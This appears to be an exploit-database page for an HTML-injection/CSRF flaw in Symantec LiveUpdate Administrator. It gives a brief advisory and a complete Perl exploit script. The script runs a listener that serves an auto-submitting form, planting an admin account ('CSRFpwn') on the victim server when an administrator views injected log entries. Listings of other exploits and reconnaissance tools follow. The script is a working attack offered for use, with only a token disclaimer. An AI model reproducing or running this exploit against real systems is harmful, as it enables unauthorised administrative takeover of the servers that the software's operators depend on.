"Symantec LiveUpdate Administrator Management GUI - HTML Injection"

Author

Exploit author

"Nikolas Sotiriu"

Platform

Exploit platform

windows

Release date

Exploit published date

2011-03-23

                
                    
                         Download file
                    
                
            
source: https://www.securityfocus.com/bid/46856/info

Symantec LiveUpdate Administrator is prone to an HTML-injection vulnerability.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.


#!/usr/bin/perl

##
#  Title:     Symantec Live Update Administrator CSRF Exploit
#  Name:      luaCSRF.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
#  Use it only for education or ethical pentesting! The author accepts
#  no liability for damage caused by this tool.
#
##


use Socket;
use IO::Handle;
use Getopt::Std;

my %args;
getopt('g:h:', \%args);

my $payload     = $args{g} || usage();
my $victim      = $args{h} || usage();

banner();

if ($payload eq "1") {
        print "[+] Using the Alert Box payload\n";
        # Alert Box
        $html = <<ENDHTML;
<html>
<SCRIPT LANGUAGE="JavaScript">alert('!!!XSS/CSRF vulnerability!!!')</SCRIPT>
</html>

ENDHTML

} elsif ($payload eq "2") {
        print "[+] Using the add admin user payload\n";
        # Adds the user CSRFpwn with password 12345678
        $html = <<ENDHTML;
<html>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://$victim:7070/lua/adduser.do" method="post">
                <input type="hidden" name="dispatch" value="save" />
                <input type="hidden" name="username" value="CSRFpwn" />
                <input type="hidden" name="password" value="12345678"/>
                <input type="hidden" name="verifyPassword" value="12345678"/>
                <input type="hidden" name="lastname" value="junk" />
                <input type="hidden" name="firstname" value="junk" />
                <input type="hidden" name="email" value="junk&#64;junk.com" />
                <input type="hidden" name="userRole" value="1" />
            </form>
        </body>
</html>

ENDHTML

}

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "[-] socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "[-] Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in(80,INADDR_ANY);
bind(SOCK,$my_addr) or die "[-] bind() failed: $!";
listen(SOCK,SOMAXCONN) or die "[-] listen() failed: $!";
warn "[+] waiting for incoming connections on port 80...\n";
warn "[+] Enter the following String in the LUA username login field\n";
warn "[+] (e.q. HTTP/SSH) and wair for the admin to view the Logs\n";
warn "[+]\n";
warn "[+] <frame src=http://<LOCAL_ADDRESS>/.html>\n";

$repeat = 1;
$victim = inet_aton("0.0.0.0");
while($repeat) {
    my $remote_addr = accept(SESSION,SOCK);
    my ($port,$hisaddr) = sockaddr_in($remote_addr);
    warn "[+] Connection from [",inet_ntoa($hisaddr),",$port]\n";
    $victim = $hisaddr;
    SESSION->autoflush(1);
    if(<SESSION>) {
       print SESSION $http_header . $html;
    }
    warn "[+] Connection from [",inet_ntoa($hisaddr),",$port] finished\n";
    close SESSION;
}

sub usage {
print $payload;
    print "\n";
    print " luaCSRF.pl - Symantec LUA CSRF Exploit\n";
    print "===============================================================\n\n";
    print "  Usage:\n";
    print "           $0 -g <payload> -h <lua-ip>\n";
    print "  Optional:\n";
    print "           -p       <local port to listen on>\n";
    print "           -g (1|2) <payload to use>\n";
    print "                    1 <Execute an alert box\n";
    print "                    2 <Add the Admin User \"CSRFpwn\">\n";
    print "  Notes:\n";
    print "           -nothing here\n";
    print "\n";
    print "  Author:\n";
    print "           Nikolas Sotiriu (lofi)\n";
    print "           url: www.sotiriu.de\n";
    print "           mail: lofi[at]sotiriu.de\n";
    print "\n";


    exit(1);
}

sub banner {
        print STDERR << "EOF";
--------------------------------------------------------------------------------
               luaCSRF.pl - Symantec LUA CSRF Exploit
--------------------------------------------------------------------------------

                                   111 1111111
                            11100 101 00110111001111
                        11101 11 10 111 101 1001111111
                    1101  11 00 10 11  11 111 1111111101
                 10111 1 10 11 10  0 10  1 1 1  1111111011
              1111  1 1 10  0  01 01 01 1 1 111     1111011101
            1000   0 11 10 10  0 10 11 111 11111 11 1111 111100
          1111111111 01 10 10 11 01 0  11 11111111111 1 1111  11
         10111110 0  01 00 11 1110 11 10 11111111111 11 11111  11   111
        101111111 0 10  01 11 1 11 0 10 11 1111111111111111 1111110000111
        011111 0110 10 10  0 11 1 11 01 01 111111111111111 1 11110011001
       1011111 0110 10 11 1110 11 1 10 11111111111111111111  1 100  001
       1011111 0 10 10 01 1  0 1 11 1 111111111111111111111111 001101
        011111 0  0  0 11 0 1111 0 11 01111111111111111111111111  01
       1111111 01 01 111  1 1111 1 11 1111111111111111111111 1101 1111
      111 1111 10  0 111110 0111 0 1  0111111111111111111111 11111 1111
     111 11111  1  11 1 1 1    111 11 11111111111111111111111110    1001
    111 1011111   1 11111111110111111111111111111111111111111 01 10111001
   11 1100    10110110    10001        11101111111111111111  10 111 11100
  111  00      1011101      00101       0  11111111111111111001 11  111101
  11  00        00 101      1000011     1011   1111   1111111000 1111111 0
  11 00          0   1011      100001    101000 1 1001         00001111  01
  01101          11111 1011               01100    0101          110  11 10
  10111                   1                0  01    0000011         10    10
   10011                                    11100       1111         101   11
      1110 01                                 101011                   1001100
         1111000011                            1  111
                11000001111
                           1

EOF
}

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2013-01-18	"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution"	webapps	multiple	"Nikolas Sotiriu"
2013-01-18	"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass"	webapps	multiple	"Nikolas Sotiriu"
2011-03-23	"Symantec LiveUpdate Administrator Management GUI - HTML Injection"	webapps	windows	"Nikolas Sotiriu"
2010-08-27	"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution"	webapps	linux	"Nikolas Sotiriu"
2010-08-19	"SonicWALL E-Class SSL-VPN - ActiveX Control Format String Overflow"	dos	windows	"Nikolas Sotiriu"
2010-03-04	"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities"	remote	windows	"Nikolas Sotiriu"
2009-11-02	"Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)"	remote	windows	"Nikolas Sotiriu"
2009-10-20	"Websense Email Security - Cross-Site Scripting"	webapps	hardware	"Nikolas Sotiriu"
2009-10-20	"Websense Email Security - Denial of Service"	dos	hardware	"Nikolas Sotiriu"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Symantec LiveUpdate Administrator Management GUI - HTML Injection"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.